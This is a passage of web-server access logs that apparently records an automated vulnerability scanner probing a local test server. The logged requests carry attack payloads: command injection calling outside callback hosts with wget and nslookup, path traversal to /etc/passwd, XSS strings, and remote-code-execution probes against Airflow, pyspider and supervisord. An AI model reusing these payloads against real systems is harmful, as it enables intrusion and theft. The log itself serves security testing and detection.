HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"sidefunc=update&syear=111'","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /Side.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wabam HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"&act=sync&task_number=1;wget http://ca2tuc8smpv1g2s80ca0koxrzukda8aa6.oast.pro","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /en/php/usb_sync.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:@example.com%5C@WillBeReplaced.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.servlet HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"{\x22conf\x22: {\x22message\x22: \x22\x5C\x22; touch test #\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.css?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zp/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /seminovos/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opennms/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nuclei.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/list HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v2/auth/roles HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vendor/phpfastcache/phpfastcache/examples/phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /airflow.cfg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wabam/favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sample.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWebAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://;@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///querybuilder.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"submitId=debug&debugCmd=wget+http://ca2tuc8smpv1g2s80ca0kch6dsouqdf8c.oast.pro&submitEnd=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.htm HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.ico?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gallery/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /shop/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /oliver/FileServlet?source=serverFile&fileName=c:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/list HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.013","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"webdav_mode=false&script=from+pyspider.libs.base_handler+import+*%0Aclass+Handler(BaseHandler)%3A%0A++++def+on_start(self)%3A%0A++++++++print(str(452345672+%2B+567890765))&task=%7B%0A++%22process%22%3A+%7B%0A++++%22callback%22%3A+%22on_start%22%0A++%7D%2C%0A++%22project%22%3A+%22pyspidervulntest%22%2C%0A++%22taskid%22%3A+%22data%3A%2Con_start%22%2C%0A++%22url%22%3A+%22data%3A%2Con_start%22%0A%7D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /debug/pyspidervulntest/run HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"{\x0D\x0A \x22token\x22: {\x0D\x0A \x22$func\x22: \x22var_dump\x22\x0D\x0A }\x0D\x0A}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth/newpassword HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /calendar/calendar_form.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /a.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWebAdmin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///querybuilder.json.servlet HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%5Ctexample.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.png?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-----------------------------77916619616724262872902741074\x0D\x0AContent-Disposition: form-data; name=\x22upload\x22; filename=\x2229N5EmA7LfdXvc4qhEjD4PrmhRI.txt\x22\x0D\x0AContent-Type: text/plain\x0D\x0ATest\x0D\x0A-----------------------------77916619616724262872902741074--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /site_cg/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /concerto/Login?goto=Central HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_projectfork§ion=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"\x0D\x0A supervisor.supervisord.options.warnings.linecache.os.system\x0D\x0A \x0D\x0A \x0D\x0A nslookup ca2tuc8smpv1g2s80ca03gj3npxi5do6k.oast.pro\x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /RPC2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?s=ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /profile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 